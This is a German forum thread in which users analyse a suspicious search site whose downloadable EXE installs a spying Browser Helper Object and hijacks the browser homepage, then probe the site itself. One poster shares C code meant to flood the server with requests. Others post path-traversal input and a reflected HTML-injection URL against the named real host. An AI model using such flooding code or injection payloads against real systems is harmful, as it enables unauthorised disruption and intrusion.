3. Was soll das denn sein?

Was soll das denn sein?

  • M

    Sieht so aus, als wollten sie tatsächlich einen "legalen" Suchdienst anbieten, aber scheinbar befinden sie sich
    noch in der Entwicklungsphase. Wenn man deren Programm startet, muss man zuerst der EULA zustimmen, die einem
    auch entsprechend mitteilt, was die nicht ganz offensichtlich installierte Software tut.

    Danach erscheint ein Fenster, in dem eigentlich die Suchergebnisse angezeigt werden sollten mit der Überschrift "Links for the keyword ' '", es ist allerdings leer. Währenddessen erzeugt es die Dateien st.dll und unst.exe im Windows-Verzeichnis. Die unst.exe wird in der Windows-Firewall freigeschaltet und die st.dll enthält ein Browser Helper Object(identifiziert sich als "System Process"), das sich nicht sichtlich bemerkbar macht, aber einen dann wohl im Hintergrund ausspioniert.

    Naja, alles in allem nicht sehr nett 🙂 Hab die Datei mal an Symantec geschickt, da mein Norton Antivirus 2004 die Datei nicht kannte.

    ---------------------------------------------
    EDIT: EULA entfernt, da ist mir jemand zuvorgekommen 🙂

    ---------------------------------------------

    0
  • R

    BF_31 schrieb:

    Erstmal fällt die Adresse auf
    Als zweites: Tippt mal iiirgendwas ein, diese Maschine findet immer 100% - IMMER! auch wenn man nach "fdjkfjdf8j3849j3r8jdfdsrnn3" sucht 100%!

    Was sollte denn auch weniger als 100% bedeuten? Ich meine entweder findet man etwas oder nicht. Wie sollte man hier eine Prozentzahl angeben? lol

    0
  • B

    kingruedi schrieb:

    BF_31 schrieb:

    Erstmal fällt die Adresse auf
    Als zweites: Tippt mal iiirgendwas ein, diese Maschine findet immer 100% - IMMER! auch wenn man nach "fdjkfjdf8j3849j3r8jdfdsrnn3" sucht 100%!

    Was sollte denn auch weniger als 100% bedeuten? Ich meine entweder findet man etwas oder nicht. Wie sollte man hier eine Prozentzahl angeben? lol

    Schonmal bei heise.de gesucht?
    Die suchen auch nach Prozent 😉

    0
  • M

    ich hab mir erst mal ein paar filme runtergeladen... sogar als executable 😃

    edit: (omfg)

    http://www.error-page.de/la2/exe_files/

    0
  • B

    Anscheinend erstellen die wirklich für jeden Suchvorgang eine neue exe-Datei...
    Lasst sie uns mit ihren eigenen Waffen schlagen, und Suchabfragen im Sekundentakt ausführen (am besten ein Tool dafür schreiben) Irgendwann platzt denen der Server 😃

    0
  • ?

    BF_31 schrieb:

    Anscheinend erstellen die wirklich für jeden Suchvorgang eine neue exe-Datei...
    Lasst sie uns mit ihren eigenen Waffen schlagen, und Suchabfragen im Sekundentakt ausführen (am besten ein Tool dafür schreiben) Irgendwann platzt denen der Server 😃

    daran hab ich auch schon gedacht, aber wahrscheinlich erstellen sie die dateien erst, wenns jemand wirklich runterlädt...

    0
  • B

    Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

    0
  • M

    Die scheinen außerdem aus den Sucheingaben ohne weitere Überprüfung den Pfad durch Anhänhgen von .exe zu erstellen. Wenn man zum Beispiel "../xyz" eingibt, erhält man einen permission denied-Fehler für das übergeordnete Verzeichnis. 🙂

    0
  • C

    Es kann ja mal einer dem Besitzer der Domain schreiben und fragen, was seine lustige Suchmaschine im Netz bezweckt. Die Daten gibt's bei denic.

    Hab versucht, ein kleines Prog zu schreiben, welches Requestbombing durchführt,
    hab aber keine Lust, weiter zu machen, weils nicht funktioniert! Hier der Code!

    #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define BUF_SIZ	4096

int send_request(const int sock, const char *hostname)
{
	char request[BUF_SIZ];
	int i;

	while (1){

	sprintf(request, "GET la2/?param=%d&search=finden%A0%21&cat=fb_loc HTTP/1.1\r\n"
		, i);

	if (send(sock, request, strlen(request), 0) == -1)
	{
		perror("send() failed");
		return 1;
	}

	}
	return 0;
}

int view_response(const int sock)
{
	char response[BUF_SIZ];
	int bytes;

	while((bytes = recv(sock, response, sizeof(response), 0)) > 0)
		fwrite(response, 1, bytes, stdout);

	if (bytes < 0)
	{
		perror("recv() failed");
		return 1;
	}

	return 0;
}

int main(int argc, char *argv[])
{
	struct hostent *host;
	struct sockaddr_in addr;
	int s;

	WSADATA wsa;
		if (WSAStartup(MAKEWORD(1, 1), &wsa))
		{
			printf("WSAStartup() failed, %lu\n", (unsigned long)GetLastError());
			return EXIT_FAILURE;
		}

	if (argc < 2)
	{
		fprintf(stderr, "usage: %s <host>\n", argv[0]);
		return 1;
	}

	s = socket(PF_INET, SOCK_STREAM, 0);
	if (s == -1)
	{
		perror("socket() failed");
		return 3;
	}

	printf("connecting to %s:80...", inet_ntoa(addr.sin_addr));
	fflush(stdout);

	addr.sin_port = htons(80);
	addr.sin_family = AF_INET;

	if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
	{
		perror("connect() failed");
		return 4;
	}

	puts("ok.");

	if (send_request(s, argv[1]))
		return 5;

	if (view_response(s))
		return 6;

	return 0;
}

    Hoffentlich verstosse ich damit nicht gegen das Teledienstgesetz oder was da sonst so greifen könnte.
    Wenn der sich n Spass mit uns erlaubt, dürfen wir das doch auch!

    Viel Spass damit!

    0
  • ?

    BF_31 schrieb:

    Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

    woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

    0
  • B

    phräger schrieb:

    BF_31 schrieb:

    Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

    woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

    Weil es sich in dem Verzeichnis befindet das Moh gepostet hat.

    0
  • ?

    BF_31 schrieb:

    phräger schrieb:

    BF_31 schrieb:

    Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

    woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

    Weil es sich in dem Verzeichnis befindet das Moh gepostet hat.

    autsch. das hab ich überlesen.
    naja, dann waren wohl wirklich stümper am werk...

    wie lang sind eigentlich die maximalen dateinamen auf einem server?

    0
  • P
     

    Warning: copy(exe_files/DasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServer.exe): failed to open stream: File name too long in /home/www/ph2s500/html/la2/cfile.php on line 7

Warning: fopen(exe_files/DasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServer.exe): failed to open stream: File name too long in /home/www/ph2s500/html/la2/cfile.php on line 8

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 9

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fclose(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 12

    😃

    0
  • S

    ROFL 😃

    Das gibt's doch nicht!! 😮

    0
  • ?

    Hi!

    Ich hab mal sone exe auf mein Schrottrechner gezogen.
    War eigentlich nix weiter dran, aber Prlötzlich erscheint immer ein
    Icon "Internet Explorer". Aber denkste. Das ist nicht der Internetexplorer,
    sondern ein Link zu www.finding.de

    Außerdem ändert der Internet Explorer jedes mal beim schließen seine
    Sartseite, also auch auf www.finding.de

    Hat jemand ne Ahnung, wie ich das wieder weg kriege?

    0
  • G

    Wollt ihr wissen, was der Kerl als nächstes ausheckt? Ja? Dann probierts mal mit http://www.error-page.de/la3/ . Ist aber irgendwie das selbe. Habe ne Zeit lang probiert, das ganze zu hacken, hat nicht geklappt *g*
    geloescht

    EDIT: In der neuen Version ist es sogar möglich, ../ zu verwenden...
    EDIT2: Schreibe beliebige Infos in die Antwort-Seite (also nicht die .exe): http://www.error-page.de/la3/?param=u">HIERDEINENACHRICHT&search=finden

    0
  • M

    Mann, sowas geiles hab ich schon ewig nicht mehr gesehen! 😮

    😃

    0
  • ?

    War bestimmt die selbe WebAgentur, die auch die Arbeitsamtseiten damals geschrieben hat.

    0
  • ?

    geloescht schrieb:

    Habe ne Zeit lang probiert, das ganze zu hacken, hat nicht

    Dann hast du nicht die richtigen Werkzeuge 😉

    0
  • I

    *rofl* das ist so geil 😃
    ich spiel grad ein bisschen mit der
    vermutlich 1. version http://www.error-page.de/la/
    die scheint noch verbuggter zu sein

    Ps. ich seh grad man kann auch sachen uploaden..*freu*

    0
Anmelden zum Antworten